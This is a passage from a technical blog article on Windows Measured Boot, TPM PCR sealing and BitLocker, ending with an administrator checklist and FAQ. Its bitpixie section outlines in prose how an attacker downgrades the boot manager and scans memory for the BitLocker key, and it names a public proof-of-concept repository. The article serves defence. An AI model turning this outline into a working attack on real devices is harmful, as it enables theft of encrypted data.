&lt;td&gt;Vulnerable&lt;/td&gt;
&lt;td&gt;Mitigated (PIN required)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Verifier policy size&lt;/td&gt;
&lt;td&gt;O(vendors x versions)&lt;/td&gt;
&lt;td&gt;O(vendor)&lt;/td&gt;
&lt;td&gt;O(profile)&lt;/td&gt;
&lt;td&gt;O(profile + PIN policy)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;DRTM solves the OEM diversity problem. It does not solve the problem that the log is unsigned, the measurement is a hash and not a &lt;em&gt;good&lt;/em&gt; hash, and the CRTM is an axiom. What can measurement never prove?&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits: What Measurement Can Never Prove&lt;/h2&gt;
&lt;p&gt;Restate the axiom from §2: the first hash in the chain is an axiom; the silicon that computes it is itself unmeasured. CRTM is the &lt;em&gt;Root of Trust for Measurement&lt;/em&gt;, not the &lt;em&gt;Root of Trust for Everything&lt;/em&gt;. The trust we can claim is that, &lt;em&gt;given&lt;/em&gt; the integrity of the silicon and the immutability of the embedded keys, the chain is a faithful record of what ran. The &quot;given&quot; is doing all the work.&lt;/p&gt;
&lt;p&gt;Three limits, each architectural and not implementational.&lt;/p&gt;
&lt;h3&gt;8.1 Trust on first measurement&lt;/h3&gt;
&lt;p&gt;The CRTM has nothing under it. If you compromise the silicon -- through a faulTPM-class SoC voltage glitch against an AMD fTPM, through SPI-bus sniffing of a discrete TPM, through a Pluton supply-chain tamper, through an Intel Boot Guard key extraction -- the rest of the chain is, formally, useless. The verifier asks the chip &quot;what ran?&quot;; the chip computes the answer using cryptographic primitives the chip itself implements; if the chip is malicious, every answer is consistent with whatever boot history the attacker wishes. The TPM&apos;s &lt;code&gt;TPM2_Quote&lt;/code&gt; signature is bound to the chip&apos;s own AIK; if the chip is the attacker, the signature is honest about a lie.&lt;/p&gt;
&lt;p&gt;This is not a flaw of TPM 2.0. It is a feature of mathematics. You cannot bootstrap trust from nothing. AEGIS knew this in 1997; the TCG accepted it in 1999; every silicon root of trust still depends on it in 2026. The only mitigations are (a) make the silicon as small and audited and physically resistant as the budget allows (which is why Pluton ships a separate sub-millimetre microcontroller), and (b) bind the chip&apos;s identity to a manufacturer-rooted certificate chain that an out-of-band auditor can verify -- which is why Hello for Business enrollment cross-checks the EK certificate against the OEM root before issuing the device-bound key.&lt;/p&gt;
&lt;h3&gt;8.2 A PCR value is a hash, not a &lt;em&gt;good&lt;/em&gt; hash&lt;/h3&gt;
&lt;p&gt;The TPM has no knowledge of what is good. PCR[0] holding &lt;code&gt;0xC4F7...&lt;/code&gt; is just a number. To the TPM it is no more or less suspicious than &lt;code&gt;0xA21E...&lt;/code&gt;. The TPM&apos;s job, during &lt;code&gt;TPM2_PolicyPCR&lt;/code&gt;+&lt;code&gt;TPM2_Unseal&lt;/code&gt;, is to refuse the key release if the PCRs do not match the seal-time digest -- &lt;em&gt;regardless&lt;/em&gt; of whether the seal-time digest was a benign value or a malicious one.&lt;/p&gt;

A PCR value is a hash, not a *good* hash.
&lt;p&gt;This is why a sealed BitLocker VMK released on a successful &lt;code&gt;TPM2_PolicyPCR&lt;/code&gt; match is &lt;em&gt;not&lt;/em&gt; a guarantee that the booted code was actually trustworthy. It is a guarantee that the booted code matched the seal-time digest. If at seal time the platform was running an older, signed, but vulnerable &lt;code&gt;bootmgfw.efi&lt;/code&gt;, the seal binds to &lt;em&gt;that&lt;/em&gt; boot manager&apos;s PCR[11]. Years later, when an attacker downgrades to that same older, signed boot manager, PCR[11] reproduces the seal-time digest exactly, and the TPM cheerfully releases the key. This is the mechanism that makes bitpixie work; we will meet it again in Section 9.&lt;/p&gt;
&lt;p&gt;The verifier -- BitLocker policy, Azure Attestation policy, Intune DHA, your fleet management tool -- is the only entity that knows what &lt;em&gt;good&lt;/em&gt; means. The TPM provides reporting infrastructure; the verifier provides policy infrastructure. &lt;em&gt;Measurement is reporting infrastructure, not policy infrastructure.&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Measurement is reporting infrastructure, not policy infrastructure. The TPM knows what was measured; only the verifier knows what is good. Every BitLocker unseal, every Azure Attestation, every Intune DHA verdict is a &lt;em&gt;policy&lt;/em&gt; decision made by software outside the TPM, against a number the TPM merely reports.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A sealed VMK released on a successful &lt;code&gt;TPM2_PolicyPCR&lt;/code&gt; match is &lt;em&gt;not&lt;/em&gt; a guarantee that the booted code was actually trustworthy. It is a guarantee that the booted code matched the seal-time digest. If seal time captured a vulnerable but signed binary, every subsequent boot of that same vulnerable signed binary will unseal cleanly. This is the architectural reason bitpixie works against TPM-only BitLocker even on fully patched 2025 firmware.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;8.3 The log is unsigned&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;TPM2_Quote&lt;/code&gt; signs only the PCR values plus the verifier&apos;s nonce. It does not sign the TCG event log. A malicious firmware can extend an honest digest into the TPM and report a &lt;em&gt;different&lt;/em&gt; event in the log it hands the OS. The PCR is correct; the log is a fabrication. Detection comes only from the verifier &lt;em&gt;replaying&lt;/em&gt; the log against the quoted PCRs and flagging a mismatch.&lt;/p&gt;
&lt;p&gt;In practice this is not a problem on benign firmware, because the firmware has no incentive to lie about its own events. It becomes a problem precisely in the cases where the firmware is the attacker -- BlackLotus-class implants that own the boot manager, faulTPM-class chip compromises that own the TPM. In those cases, a verifier that trusts both the log and the quote without replaying is trusting a forged document.&lt;/p&gt;
&lt;p&gt;The mitigation is structural and well-known: verifiers MUST replay. Azure Attestation, Intune DHA, and Microsoft&apos;s reference attestation library all replay the log against the quoted PCRs and refuse to issue a token on mismatch. Operators rolling their own attestation pipeline often skip the replay step, especially in early-prototype deployments. &lt;em&gt;Skip the replay and you have an unauthenticated event list dressed up as evidence.&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;8.4 The cuckoo attestation class (Parno 2008)&lt;/h3&gt;
&lt;p&gt;There is a class of attack that no amount of replay or PCR profile tightening can stop. Bryan Parno&apos;s 2008 HotSec paper [@parno-hotsec-pdf] names the problem the &lt;em&gt;cuckoo attack&lt;/em&gt; and proposes the first formal model for establishing trust in a platform under that threat. The abstract, paraphrased lightly to fit this article&apos;s word-list: any naive approach falls victim to a cuckoo attack; the model, in Parno&apos;s own phrasing, &lt;em&gt;&quot;reveals the cuckoo attack problem&quot;&lt;/em&gt;.&lt;/p&gt;

An attestation-relay attack in which a verifier challenges a compromised device, the compromised device proxies the challenge to a separate, genuine, attested device elsewhere, the genuine device produces a valid signed quote, the compromised device returns that quote as if it were its own, and the verifier accepts. Without out-of-band identification of *this* device&apos;s endorsement key, the verifier cannot distinguish &quot;the EK that signed the quote&quot; from &quot;an EK in the world that signed a quote.&quot; Named by Bryan Parno in 2008 by analogy with the cuckoo bird&apos;s brood parasitism.

A TPM-resident asymmetric key whose certificate is signed by the platform&apos;s Endorsement Key certificate chain, used to sign `TPM2_Quote` responses. The verifier checks the AK&apos;s certificate chain to the OEM root before trusting the quote. If the EK chain is not pre-bound to *this* device&apos;s serial number (or some other out-of-band identifier), an attacker can relay the challenge to a different TPM and return a valid signature from that TPM&apos;s AK.
&lt;p&gt;The cuckoo class is closeable, but only by binding the AK to &lt;em&gt;this&lt;/em&gt; device&apos;s identity before trust is needed. Microsoft Autopilot [@ms-aa-tpm-concepts] and Windows Hello for Business do this transparently during device enrollment: the EK certificate chain is captured at first boot, cross-checked against the OEM root, and the resulting AK is bound to a specific Microsoft Entra ID device object. Ad-hoc attestation deployments that do not capture the EK chain at enrollment are vulnerable.&lt;/p&gt;
&lt;p&gt;Bryan Parno is now at Carnegie Mellon [@cmu-parno] and was on sabbatical at Amazon during 2025. The cuckoo paper remains, on its eighteenth birthday, the canonical reference for the class.&lt;/p&gt;
&lt;p&gt;Permanent limits accepted. What are people actively trying to fix that we have not solved yet?&lt;/p&gt;
&lt;h2&gt;9. Open Problems: bitpixie, the dbx-Update UX, and What&apos;s Next&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;The fix is the breakage&lt;/em&gt;. The patch that closes the most dangerous BitLocker bypass of the decade is also the patch that drowns help-desks in 48-digit recovery prompts. The structural entanglement of these two facts is the central open problem of measured boot in 2026.&lt;/p&gt;
&lt;h3&gt;9.1 bitpixie (CVE-2023-21563)&lt;/h3&gt;
&lt;p&gt;An attacker reaches behind a fully-patched, BitLocker-enabled Windows 11 laptop. They plug in a LAN cable. They plug in a USB keyboard. They press F12 to boot from network. Within five minutes the disk encryption key is on their disk.&lt;/p&gt;
&lt;p&gt;That is bitpixie. From the Neodyme write-up [@neodyme-bitpixie]: &lt;em&gt;&quot;Thanks to a bug discovered by Rairii in August 2022, attackers can extract your disk encryption key on Windows&apos; default &apos;Device Encryption&apos; setup. This exploit, dubbed bitpixie, relies on downgrading the Windows Boot Manager. All an attacker needs is the ability to plug in a LAN cable and keyboard to decrypt the disk.&quot;&lt;/em&gt; The CVE is CVE-2023-21563 [@nvd-2023-21563], described as a &lt;em&gt;&quot;BitLocker Security Feature Bypass Vulnerability&quot;&lt;/em&gt; with the MSRC advisory at CVE-2023-21563 [@msrc-2023-21563].&lt;/p&gt;
&lt;p&gt;The mechanism is the second aha moment from Section 8 made operational. From SySS&apos;s bitpixie technical write-up [@syss-bitpixie]: &lt;em&gt;&quot;The bitpixie vulnerability in Windows Boot Manager is caused by a flaw in the PXE soft reboot feature, whereby the BitLocker key is not erased from memory. To exploit this vulnerability on up-to-date systems, a downgrade attack can be performed by loading an older, unpatched boot manager.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The chain in detail: (1) The attacker boots the target normally. The boot manager unseals the VMK, hands it to &lt;code&gt;winload.efi&lt;/code&gt;, and loads BitLocker into the boot path. (2) Before &lt;code&gt;winload.efi&lt;/code&gt; zeroes the VMK from RAM, the attacker triggers a PXE soft reboot (a feature of older boot manager versions) that returns control to the boot manager without a full platform reset. (3) The attacker now PXE-boots a Linux image that scans physical memory for the BitLocker FVE marker &lt;code&gt;-FVE-FS-&lt;/code&gt; and extracts the VMK. The platform reset never happened, the RAM never cleared, the TPM never re-quoted -- the VMK is just lying there in untouched physical memory.&lt;/p&gt;
&lt;p&gt;The downgrade: the older boot manager whose soft-reboot path leaks the VMK is still signed by the Microsoft 2011 production certificate, which is still in &lt;code&gt;db&lt;/code&gt; on every Secure Boot machine until that certificate&apos;s natural 2026 expiry. PCR[7] -- the policy PCR -- accepts the downgraded boot manager because &lt;em&gt;the boot manager is still validly signed&lt;/em&gt;. PCR[11] still matches the seal-time digest because, at seal time, that exact older boot manager was the one running. The TPM unseals. BitLocker unlocks. The attack proceeds.&lt;/p&gt;
&lt;p&gt;This is the third aha moment from the article&apos;s structure: &lt;em&gt;a PCR replay attack with a still-trusted older signed binary&lt;/em&gt;. The TPM is not malfunctioning. The policy is not misconfigured. The seal is doing exactly what it was sealed to do: release the key if the boot reproduces the boot it was sealed against. The attacker just produced the seal-time boot, in 2024, using a signed-but-vulnerable binary the verifier has not revoked.&lt;/p&gt;
&lt;p&gt;Public disclosure landed at the 38th Chaos Communication Congress in December 2024 [@38c3-bitpixie]. From the talk abstract verbatim: &lt;em&gt;&quot;since 2022, when Rairii discovered the bitpixie bug (CVE-2023-21563). While this bug is &apos;fixed&apos; since Nov. 2022 and publically known since 2023, we can still use it today with a downgrade attack to decrypt BitLocker.&quot;&lt;/em&gt; The full attack chain was demonstrated on stage by Thomas Lambertz of Neodyme. The proof-of-concept code is at github.com/martanne/bitpixie [@gh-martanne-bitpixie].The repository handle &lt;code&gt;martanne&lt;/code&gt; is the GitHub username; the discoverer is Rairii (August 2022); the 38C3 presenter is Thomas Lambertz (Neodyme). Press accounts that refer to &quot;martanne&quot; as a person are confusing the GitHub handle with an author identity.&lt;/p&gt;
&lt;h3&gt;9.2 The KB5025885 / Windows UEFI CA 2023 rotation&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s structural response is documented in the canonical KB article on Boot Manager revocations [@ms-kb5025885]. The fix is in three stages. Stage 1: enroll the new &lt;em&gt;Windows UEFI CA 2023&lt;/em&gt; certificate in the Secure Boot &lt;code&gt;db&lt;/code&gt; variable. Stage 2: replace existing boot manager binaries with copies signed by the 2023 CA instead of the 2011 CA. Stage 3: revoke the 2011 CA in &lt;code&gt;dbx&lt;/code&gt;. The full rollout is gated on the 2026 natural expiry of the original Microsoft production signing certificate.&lt;/p&gt;
&lt;p&gt;Every one of those three stages changes PCR[7]. &lt;em&gt;Every one&lt;/em&gt;. Stage 1 adds bytes to &lt;code&gt;db&lt;/code&gt;; Stage 3 adds bytes to &lt;code&gt;dbx&lt;/code&gt;; even Stage 2, which doesn&apos;t touch the Secure Boot variables directly, ships a new boot manager binary whose Authenticode digest moves PCR[4]. On TPM-only BitLocker bound to &lt;code&gt;0x880 = PCR[7] + PCR[11]&lt;/code&gt;, the recovery prompt fires twice for every customer.&lt;/p&gt;
&lt;h3&gt;9.3 BlackLotus (CVE-2022-21894 &quot;Baton Drop&quot;)&lt;/h3&gt;
&lt;p&gt;The bitpixie story does not stand alone. On March 1, 2023, ESET researcher Martin Smolár disclosed BlackLotus [@eset-blacklotus] -- in his own words, &lt;em&gt;&quot;the first publicly known UEFI bootkit bypassing the essential platform security feature -- UEFI Secure Boot -- is now a reality.&quot;&lt;/em&gt; BlackLotus exploits CVE-2022-21894 [@nvd-2022-21894] (&quot;Baton Drop&quot;), a Secure Boot bypass in a Microsoft-signed boot manager. From the ESET write-up [@eset-blacklotus]: &lt;em&gt;&quot;Although the vulnerability was fixed in Microsoft&apos;s January 2022 update, its exploitation is still possible as the affected, validly signed binaries have still not been added to the UEFI revocation list. BlackLotus takes advantage of this, bringing its own copies of legitimate -- but vulnerable -- binaries to the system in order to exploit the vulnerability.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The structural fix for BlackLotus is identical to the structural fix for bitpixie: revoke the vulnerable signed binaries in &lt;code&gt;dbx&lt;/code&gt;. Microsoft shipped the BlackLotus &lt;code&gt;dbx&lt;/code&gt; revocations in May 2023; that update is the source of most of the &quot;PCR[7] moved overnight&quot; stories from the second half of 2023. The break-fix-break loop is now a recurring operational reality, not an exception.&lt;/p&gt;

the first publicly known UEFI bootkit bypassing the essential platform security feature -- UEFI Secure Boot -- is now a reality. -- Martin Smolár, ESET Research, March 1, 2023
&lt;h3&gt;9.4 The break-fix-break loop&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The fix is the breakage. Every dbx update that closes a Secure Boot bypass changes PCR[7]. Every PCR[7] change forces a 48-digit recovery prompt on every TPM-only BitLocker machine on the platform. The patch that closes BlackLotus or bitpixie &lt;em&gt;is&lt;/em&gt; the operational pain. Pre-boot authentication (TPM+PIN) blocks the downgrade attack from releasing the VMK without the user&apos;s PIN, but it does not eliminate PCR[7]-driven recovery: a selected-PCR change still forces suspend/resume or a planned reseal.&lt;/p&gt;
&lt;/blockquote&gt;

flowchart LR
    A[&quot;BlackLotus disclosed&lt;br /&gt;(March 2023)&quot;] --&amp;gt; B[&quot;Microsoft May 2023 dbx update&lt;br /&gt;revokes vulnerable boot managers&quot;]
    B --&amp;gt; C[&quot;PCR[7] changes on every&lt;br /&gt;UEFI Windows machine&quot;]
    C --&amp;gt; D[&quot;TPM-only BitLocker fires&lt;br /&gt;fleet-wide 48-digit prompts&quot;]
    D --&amp;gt; E[&quot;Operators delay patches&lt;br /&gt;or roll back to gain stability&quot;]
    E --&amp;gt; F[&quot;Window of vulnerability&lt;br /&gt;re-opens for class&quot;]
    F --&amp;gt; A
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The only safe pattern when applying UEFI firmware, BIOS, or Secure Boot DB/DBX changes is to suspend BitLocker first. Run &lt;code&gt;Suspend-BitLocker -RebootCount 1&lt;/code&gt; from an elevated PowerShell prompt, apply the patch, and let the suspend auto-resume on the next clean boot. The TPM never sees a PCR mismatch because BitLocker is not asking the TPM for the VMK during the patch reboot.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;9.5 Post-quantum agility for the attestation key&lt;/h3&gt;
&lt;p&gt;Looking ahead, the next structural break is cryptographic: the TPM&apos;s signing primitives (RSA-2048, ECC P-256) do not survive Shor&apos;s algorithm on a sufficiently large quantum computer. The TCG&apos;s PC Client Platform Firmware Profile revision 2 work is targeting &lt;a href=&quot;https://paragmali.com/blog/post-quantum-cryptography-on-windows-the-thirty-year-migrati/&quot; rel=&quot;noopener&quot;&gt;post-quantum agility&lt;/a&gt; for attestation keys -- ML-DSA (Dilithium) and ML-KEM (Kyber) variants of the signature and key-encapsulation primitives that &lt;code&gt;TPM2_Quote&lt;/code&gt; and &lt;code&gt;TPM2_ActivateCredential&lt;/code&gt; depend on.&lt;/p&gt;
&lt;p&gt;The constraint that limits the rollout is mechanical. The TPM 2.0 command and response buffer is, by default, 4096 bytes. A Dilithium Level 3 (ML-DSA-65) signature is 3,309 bytes per FIPS 204 [@csrc-nist-gov-204-final]. An RSA-2048 signature is 256 bytes. The buffer survives RSA quotes with vast headroom; it has roughly 800 bytes of headroom for an ML-DSA-65 quote. ML-KEM-768 (NIST Category 3) ciphertexts are 1,088 bytes per FIPS 203 [@csrc-nist-gov-203-final], with public keys at 1,184 bytes -- still tight if you also need an ML-DSA-65 signature on the same response. The PFP r2 work is largely about negotiating buffer growth across the TPM-firmware-OS path so the post-quantum primitives fit. As of 2026 this is &lt;code&gt;UNVERIFIED_FETCH&lt;/code&gt; from the TCG (the TCG specifications site [@tcg-tpm-library] returns HTTP 403 to non-browser User-Agents), but Microsoft has signalled interim TPM 2.0 deployments with enlarged buffers.&lt;/p&gt;
&lt;h3&gt;9.6 DRTM coverage gaps&lt;/h3&gt;
&lt;p&gt;DRTM is a Secured-core feature; not every fleet runs Secured-core hardware. Raw Intel TXT has shipped on vPro platforms since the Q3 2007 introduction of the Intel DQ35J board [@itl-attacking-txt-2009], but the deployable surface for Microsoft Secure Launch is narrower because Secured-Core also requires HVCI, kernel DMA protection, and an SMM Supervisor. In practice Secure Launch is available on Intel Coffee Lake (Core 8th-generation) and later platforms; on AMD with Zen 2 and later (Ryzen 3000+ desktop; EPYC 7002+ server with &lt;code&gt;SKINIT&lt;/code&gt;); and on Qualcomm Snapdragon SD850 and later on the ARM side. Fleets dominated by pre-2018 hardware -- and there are many of them, especially in cost-sensitive deployments -- cannot use Secure Launch as a SRTM allowlist substitute.&lt;/p&gt;
&lt;p&gt;For those fleets, the only deployable mitigation against bitpixie remains pre-boot authentication (TPM+PIN). The cuckoo class remains open against ad-hoc attestation pipelines that do not bind AKs to device serials at provisioning. The OEM allowlist combinatorial explosion remains the unsolved problem that pushed Microsoft to DRTM in the first place.&lt;/p&gt;
&lt;h3&gt;9.7 PFP r2 in flight&lt;/h3&gt;
&lt;p&gt;The PC Client Platform Firmware Profile is in active revision. PFP r2 is expected to formalise SHA-3 support, change the default banks to SHA-384 and SHA-512 (with SHA-256 retained for legacy compatibility), and codify the PCR[14] semantics that have been a Microsoft-vs-Linux ontology disagreement for the past decade. As of 2026 the revision is &lt;code&gt;UNVERIFIED_FETCH&lt;/code&gt; from the TCG canonical URL [@tcg-pfp] (same 403 class); the tpm2_eventlog man page [@gh-tpm2-eventlog-man] tracks the spec by name without a rev number, deliberately so it can absorb r2 without rebuild.&lt;/p&gt;

For practitioners who need a current catalogue of hardware-debugger gaps that PCR[7]&apos;s `EV_EFI_ACTION` event was supposed to close, the Wack0/bitlocker-attacks repository [@gh-wack0-bitlocker] maintains a curated index, including a reference to a DFRWS Europe 2023 paper from the Brazilian Federal Police that catalogued debug-mode firmware shipped to retail. The TCG EFI Platform Specification §6.4 quote reproduced there -- *&quot;If the platform provides a firmware debugger mode... the platform SHALL extend an EV_EFI_ACTION event into PCR[7]&quot;* -- exists precisely because shipped firmware historically did not always do this. The PCR[7] floor is not as solid as the specification suggests.
&lt;p&gt;You have read 8,000 words. You have a recovery prompt to clear on Monday morning. What do you do?&lt;/p&gt;
&lt;h2&gt;10. Practical Guide: A Monday-Morning Checklist&lt;/h2&gt;
&lt;p&gt;Six actions. Each one tied to a verified Microsoft Learn or TCG source. Run them in order; you will know more about your fleet&apos;s measured-boot posture in twenty minutes than most operators learn in a year.&lt;/p&gt;
&lt;h3&gt;10.1 Inspect your log&lt;/h3&gt;
&lt;p&gt;Run &lt;code&gt;tpmtool.exe getdeviceinformation&lt;/code&gt; from an elevated prompt; §6.7 enumerates the cross-platform and Linux equivalents. For a clean machine-readable dump, save the binary log via &lt;code&gt;MeasuredBootTool.exe -log &amp;lt;path&amp;gt;&lt;/code&gt; [@ms-tbs-get-tcg-log] (Windows HLK), then parse it with &lt;code&gt;tpm2_eventlog&lt;/code&gt; [@gh-tpm2-eventlog-man] for a portable text dump. The event stream conforms to the &lt;code&gt;TCG_PCR_EVENT2&lt;/code&gt; struct documented in the &lt;code&gt;Tbsi_Get_TCG_Log&lt;/code&gt; reference [@ms-tbs-get-tcg-log].&lt;/p&gt;
&lt;h3&gt;10.2 Confirm your BitLocker PCR profile&lt;/h3&gt;
&lt;p&gt;Run &lt;code&gt;manage-bde -status C:&lt;/code&gt; from an elevated prompt. Confirm a &lt;code&gt;Numerical Password&lt;/code&gt; protector exists -- without one, you cannot recover from a profile mismatch and you are one PCR drift away from data loss. Then inspect &lt;code&gt;HKLM\SOFTWARE\Policies\Microsoft\FVE\PlatformValidationProfileUEFI&lt;/code&gt;. On a Secure Boot UEFI machine the value should be &lt;code&gt;0x880&lt;/code&gt; (PCR[7] + PCR[11]) per the BitLocker countermeasures documentation [@ms-learn-bitlocker-counter]: &lt;em&gt;&quot;By default, BitLocker provides integrity protection for Secure Boot by using the TPM PCR[7] measurement.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;If you see &lt;code&gt;0x815&lt;/code&gt; (PCR[0,2,4,11]), you are on the non-PCR[7] legacy validation profile (a CSM/legacy boot, or a UEFI system where Secure Boot PCR[7] binding is unavailable) and every firmware update will trigger a recovery prompt. The fix is to verify Secure Boot is on (&lt;code&gt;Confirm-SecureBootUEFI&lt;/code&gt; from PowerShell), then re-seal by disabling and re-enabling the TPM protector.&lt;/p&gt;
&lt;h3&gt;10.3 Suspend BitLocker before every firmware update&lt;/h3&gt;
&lt;p&gt;The only safe pattern is this:&lt;/p&gt;

```powershell
# Run as administrator.
# Suspend BitLocker for the next 1 reboot. BitLocker auto-resumes after the
# next clean boot completes, regardless of how many additional boots happen.
Suspend-BitLocker -MountPoint &quot;C:&quot; -RebootCount 1Now run the OEM firmware updater or the Windows cumulative update that
touches Secure Boot. The PCRs will move; BitLocker will not see a mismatch
because the seal check is bypassed for this boot.
After the patch reboot, BitLocker automatically re-seals to the new PCR
values. To verify, run:
&lt;p&gt;manage-bde -status C:&lt;/p&gt;
The output should show &quot;Protection On&quot; and the new PCR profile.
&lt;pre&gt;&lt;code&gt;&amp;lt;/Spoiler&amp;gt;

### 10.4 Enable Secure Launch on Secured-Core hardware

If your hardware supports DRTM (Intel TXT-capable Coffee Lake or later, AMD Zen 2 or later with `SKINIT`, ARM SD850 or later), enable Secure Launch. The configuration guide [@ms-learn-sgsl] lists the four paths: MDM via Intune, Group Policy, the Windows Security UI, or the registry directly at `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios`. Once enabled, Secure Launch absorbs OEM firmware diversity into the small DRTM TCB, reducing the verifier&apos;s allowlist burden from O(vendors x firmware versions) to O(vendor).

### 10.5 For high-value devices, switch to TPM+PIN

This is the only deployed mitigation that closes bitpixie pre-attack. From Microsoft&apos;s countermeasures documentation [@ms-learn-bitlocker-counter], four unlock modes exist: TPM-only, TPM+startup-key, TPM+PIN, TPM+startup-key+PIN. Of those, only the modes that require a human secret survive a downgrade attack -- the attacker can recreate the seal-time PCRs by booting an older signed boot manager, but they cannot recreate the PIN.

Enable it with `manage-bde -protectors -add C: -tpmandpin &amp;lt;PIN&amp;gt;`. Users will type the PIN at boot. For Secured-Core fleets where the BIOS exposes USB and TPM+PIN before the OS, this is the best practical security/UX trade. For high-value developer or executive endpoints it is non-negotiable.

&amp;gt; **Note:** bitpixie. Every other recoverable class -- evil-maid via tampered USB, cold-boot RAM extraction at modest cost, supply-chain implants on the firmware -- has either operational mitigations or is out-of-budget for the threat model. bitpixie does not. Pre-boot authentication closes it; nothing else does.

### 10.6 Bind your attestation keys to the device at provisioning

The cuckoo class only closes if the verifier knows the *specific* TPM&apos;s endorsement key before trust is needed. Microsoft Autopilot and Hello for Business do this transparently [@ms-aa-tpm-concepts] during device enrollment, capturing the EK certificate chain and cross-checking it against the OEM root before issuing the device-bound key. Ad-hoc deployments -- &quot;we joined our domain after first boot&quot; -- usually skip this step and leave the cuckoo path open. If you run an attestation pipeline outside Hello for Business or Azure Attestation, audit your AK provisioning: is the EK chain captured at first boot, and is it bound to a unique device record?

The Monday-morning steps are six items long. The structural questions are not. We close with the questions every reader still has.

## 11. Frequently Asked Questions

&amp;lt;FAQ title=&quot;Frequently asked questions about Measured Boot and PCR-bound BitLocker&quot;&amp;gt;

&amp;lt;FAQItem question=&quot;Why am I being prompted for a 48-digit recovery key after a BIOS update?&quot;&amp;gt;
Because PCR[0] or PCR[7] changed. BitLocker&apos;s seal binds the Volume Master Key to a specific subset of PCR values captured at seal time. A UEFI firmware update changes the `EV_S_CRTM_VERSION` and `EV_EFI_PLATFORM_FIRMWARE_BLOB` digests in PCR[0]; a Secure Boot `dbx` update changes PCR[7]. On boot, the TPM runs `TPM2_PolicyPCR` against the current PCRs, fails the match, and refuses to release the VMK. BitLocker falls back to the recovery-key protector. The fix is to suspend BitLocker before the patch with `Suspend-BitLocker -MountPoint &quot;C:&quot; -RebootCount 1`, per Microsoft&apos;s BitLocker countermeasures documentation [@ms-learn-bitlocker-counter].
&amp;lt;/FAQItem&amp;gt;

&amp;lt;FAQItem question=&quot;What&apos;s the difference between Secure Boot and Measured Boot?&quot;&amp;gt;
Secure Boot is *enforcement*: it refuses to run code that isn&apos;t signed by a trusted certificate in the `db` variable. Measured Boot is *reporting*: it records what ran -- signed or not -- into PCRs and the TCG event log. They cooperate but don&apos;t substitute. Secure Boot stops a bootkit from running. Measured Boot lets a remote verifier confirm, after the fact, that no bootkit ran. The TPM-based Trusted Boot extension [@ms-learn-boot-process] continues the measurement chain into the Windows kernel, drivers, and ELAM.
&amp;lt;/FAQItem&amp;gt;

&amp;lt;FAQItem question=&quot;If Secure Boot is on, do I still need Measured Boot?&quot;&amp;gt;
Yes. The remote-attestation evidence chain is a measured-boot artifact -- Azure Attestation, Intune Device Health Attestation, Hello for Business device-bound key attestation, BitLocker PCR-bound unseal, and System Guard runtime attestation all consult the TCG event log and PCR snapshot. Secure Boot has no remote-reporting story; it cannot, by itself, prove to a verifier in Azure that this laptop in the field booted the firmware Microsoft signed off on. Measured Boot is what makes that proof possible.
&amp;lt;/FAQItem&amp;gt;

&amp;lt;FAQItem question=&quot;Why does BitLocker bind to PCR[7] instead of PCR[0,2,4,11]?&quot;&amp;gt;
Because PCR[7] is the *policy* PCR, not the *code* PCR. Firmware updates and option-ROM changes move PCR[0] and PCR[2]; Secure-Boot-policy hashes don&apos;t change unless the actual `PK`/`KEK`/`db`/`dbx` variables change. The result: a fleet on the default UEFI profile (`0x880` = PCR[7] + PCR[11]) survives Dell and HP and Lenovo firmware updates without recovery prompts, because those vendors&apos; firmware updates move PCR[0] and not PCR[7]. The trade-off is that PCR[7] only moves when Secure Boot&apos;s identity moves -- which is exactly when you do want a recovery prompt (a key revocation is a real security event). Microsoft makes the trade-off explicit in the BitLocker countermeasures documentation [@ms-learn-bitlocker-counter].
&amp;lt;/FAQItem&amp;gt;

&amp;lt;FAQItem question=&quot;Can attestation prove my OS isn&apos;t compromised right now?&quot;&amp;gt;
No. Attestation proves what *booted*. It captures the boot-time state of the platform up to a `EV_SEPARATOR` event the kernel emits early in OS bootstrap. Anything that happens after the separator -- a malicious kernel driver loaded at runtime, a memory-corruption exploit in a Win32 service, a rootkit that bypasses HVCI -- is invisible to PCR-based attestation. The runtime-attestation problem is what Windows Defender System Guard runtime attestation [@ms-learn-sgsl] and Microsoft&apos;s hypervisor-isolated runtime checks try to address; that is a separate trust system layered on top of measured boot, not part of it.
&amp;lt;/FAQItem&amp;gt;

&amp;lt;FAQItem question=&quot;What is PCR[14] for on Windows?&quot;&amp;gt;
Microsoft&apos;s Windows Boot Configuration Log convention uses PCR[14] for boot-loader-authority events -- WBCL records that capture which authorities the boot manager consulted for code-integrity decisions. The Linux shim convention uses PCR[14] for Machine Owner Key (MOK) enrolment events. Same PCR index; different ontology. A verifier reading PCR[14] must know which OS produced the log it is reading; the value is meaningless without that context. This is one of the corner cases PFP r2 is expected to formalise.
&amp;lt;/FAQItem&amp;gt;

&amp;lt;FAQItem question=&quot;Is bitpixie fixed?&quot;&amp;gt;
Not on TPM-only BitLocker, not yet. The structural fix is KB5025885 [@ms-kb5025885] (May 2023) which enrolls the new Windows UEFI CA 2023 certificate and ultimately revokes the 2011 CA in `dbx`. Full revocation is gated on the 2011 CA&apos;s 2026 natural expiry. Until then, an attacker can still downgrade to a 2011-signed boot manager whose PXE-soft-reboot path leaks the VMK. The only pre-attack mitigation that closes the class today is pre-boot authentication: TPM+PIN, or TPM+startup-key, or both. The 38C3 talk demonstrated the attack on fully-patched late-2024 firmware.
